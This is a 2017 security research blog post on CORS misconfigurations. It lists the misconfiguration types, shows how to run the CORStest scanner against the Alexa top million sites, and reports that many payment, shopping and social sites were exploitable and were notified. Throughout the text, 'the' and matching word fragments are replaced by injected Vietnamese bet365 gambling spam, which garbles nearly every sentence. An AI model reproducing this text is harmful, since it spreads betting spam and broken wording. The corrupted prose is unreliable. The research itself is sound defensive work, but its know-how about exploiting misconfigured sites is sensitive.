Dienstag, 4. Juli 2017

CORS misconfigurations on a large scale

Inspired by James Kettle's great OWASP AppSec Europe talk on CORS misconfigurations, we decided to fiddle around with CORS security issues a bit. We were curious how many websites out cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are actually vulnerable because of dynamically generated or misconfigured CORS headers.

The issue: CORS misconfiguration

Cross-Origin Resource Sharing (CORS) is a technique to punch holes into cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Same-Origin Policy (SOP) – on purpose. It enables web servers to explicitly allow cross-site access to a certain resource by returning an Access-Control-Allow-Origin (ACAO) header. Sometimes, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 value is even dynamically generated based on user-input such as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Origin header send by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 browser. If misconfigured, an unintended website can access cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 resource. Furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rmore, if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Access-Control-Allow-Credentials (ACAC) server header is set, an attacker can potentially leak sensitive information from a logged in user – which is almost as bad as XSS on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 actual website. Below is a list of CORS misconfigurations which can potentially be exploited. For more technical details on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 issues read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 this fine blogpost.
Misconfiguation Description
Developer backdoorInsecure developer/debug origins like JSFiddler CodePen are allowed to access cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 resource
Origin reflectionThe origin is simply echoed in ACAO header, any site is allowed to access cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 resource
Null misconfigurationAny site is allowed access by forcing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 null origin via a sandboxed iframe
Pre-domain wildcardnotdomain.com is allowed access, which can simply be registered by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attacker
Post-domain wildcarddomain.com.evil.com is allowed access, can be simply be set up by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attacker
Subdomains allowedsub.domain.com allowed access, exploitable if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attacker finds XSS in any subdomain
Non-SSL sites allowedAn HTTP origin is allowed access to a HTTPS resource, allows MitM to break encryption
Invalid CORS headerWrong use of wildcard or multiple origins,not a security problem but should be fixed

The tool: CORStest

Testing for such vulnerabilities can easily be done with curl(1). To support some more options like, for example, parallelization we wrote CORStest, a simple Python based CORS misconfiguration checker. It takes a text file containing a list of domain names or URLs to check for misconfigurations as input and supports some furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r options:
usage: corstest.py [arguments] infile

positional arguments:
  infile         File with domain or URL list

optional arguments:
  -h, --help     show this help message and exit
  -c name=value  Send cookie with all requests
  -p processes   multiprocessing (default: 32)
  -s             always force ssl/tls requests
  -q             quiet, allow-credentials only
  -v             produce a more verbose output
CORStest can detect potential vulnerabilities by sending various Origin request headers and checking for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Access-Control-Allow-Origin response. An example for those of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Alexa top 750 websites which allow credentials for CORS requests is given below.

Evaluation with Alexa top 1 Million websites

To evaluate – on a larger scale – how many sites actually have wide-open CORS configurations we did run CORStest on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Alexa top 1 million sites:
$ git clone https://github.com/RUB-NDS/CORStest.git && cd cors/
$ wget -q http://s3.amazonaws.com/alexa-static/top-1m.csv.zip
$ unzip top-1m.csv.zip
$ awk -F, '{print $2}' top-1m.csv > alexa.txt
$ ./corstest.py alexa.txt
This test took about 14 hours on a decent connection and revealed cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following results: Only 29,514 websites (about 3%) actually supported CORS on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir main page (aka. responded with Access-Control-Allow-Origin). Of course, many sites such as Google do only enable CORS headers for certain resources, not directly on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir landing page. We could have crawled all websites (including subdomains) and fed cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 input to CORStest. However, this would have taken a long time and for statistics, our quick & dirty approach should still be fine. Furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rmore it must be noted that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 test was only performed with GET requests (without any CORS preflight) to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 http:// version of websites (with redirects followed). Note that just because a website, for example, reflects cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 origin header it is not necessarily vulnerable. The context matters; such a configuration can be totally fine for a public sites or API endpoints intended to be accessible by everyone. It can be disastrous for payment sites or social media platforms. Furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rmore, to be actually exploitable cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Access-Control-Allow-Credentials: true (ACAC) header must be set. Therefore we repeated cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 test, this time limited to sites that return this header (see CORStest -q flag):
$ ./corstest.py -q alexa.txt
This revealed even worse results - almost half of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 websites supporting ACAO and ACAC headers contained a CORS misconfigurations that could be exploited directly by a web attacker (developer backdoor, origin reflection, null misconfig, pre-/post-domain wildcard):

The Impact: SOP/SSL bypass on payment and taxpayer sites

Note that not all tested websites actually were exploitable. Some contained only public data and some ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs - such as Bitbucket - had CORS enabled for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir main page but not for subpages containing user data. Manually testing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 sites, we found to be vulnerable:
  • A dozen of online banking, bitcoin and ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r payment sites; one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m allowed us to create a test account so we were able to write proof-of-concept code which could actually have been used to steal money
  • Hundred of online shops/e-commerce sites and a bunch of hotel/flight booking sites
  • Various social networks and misc sites which allow users to log in and communicate
  • One US state's tax filing website (however, this one was exploitable by a MitM only)
We informed all sites we manually tested and found to be vulnerable. A simple exploit code example when logged into a website with CORS origin reflection is given below.

The Reason: Copy & Paste and broken frameworks

We were furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r interested in reasons for CORS misconfigurations. Particularly we wanted to learn if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is a correlation between applied technology and misconfiguration. Therefore we used WhatWeb to fingerprint cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 web technologies for all vulnerable sites. CORS is usually enabled eicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r directly in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 HTTP server configuration or by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 web application/framework. While we could not identify a single major cause for CORS misconfigurations, we found various potential reasons. A majority of dangerous Access-Control-* headers had probably been introduced by developers, ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs however are based on bugs and bad practices in some products. Insights follow:
  • Various websites return invalid CORS headers; besides wrong use of wildcards such as *.domain.com, ACAO headers which contain multiple origins can often be found; Ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r examples of invalid - but quite creative - ACAO values we observed are: self, true, false, undefined, None, 0, (null), domain, origin, SAMEORIGIN
  • Rack::Cors, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 de facto standard library to enable CORS for Ruby on Rails maps origins '' or origins '*' into reflecting arbitrary origins; this is dangerous, because developers would think that '' allows nothing and '*' behaves according to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 spec: mostly harmless because it cannot be used to make to make 'credentialed' requests; this config error leads to origin reflection with ACAC headers on about a hundred of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 tested and vulnerable websites
  • A majority of websites which allow a http origin to CORS access a https resource are run on IIS; this seems to be no bug in IIS itself but racá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r caused by bad advises found on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Internet
  • nginx is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 winner when it comes serving websites with origin reflections; again, this is not an issue of nginx but of dangerous configs copied from "Stackoverflow; same problem for Phusion Passenger
  • The null ACAO value may be based on programming languages that simply return null if no value is given (we haven't found any specific framework though); anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r explanation is that 'CORS in Action', a popular book on CORS, contains various examples with code such as var originWhitelist = ['null', ...], which could be misinterpreted by developers as safe
  • If CORS is enabled in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 crVCL PHP Framework, it adds ACAC and ACAO headers for a configured domain. Unfortunatelly, it also introduces a post-domain and pre-subdomain wildcard vulnerability: sub.domain.com.evil.com
  • All sites that are based on "Solo Build It!" (scam?) respond with: Access-Control-Allow-Origin: http://sbiapps.sitesell.com
  • Some sites have :// or // as fixed ACAO values. How should browsers deal with this? Inconsistent at least! Firefox, Chrome, Safari and Opera allow arbitrary origins while IE and Edge deny all origins.

Beliebte Posts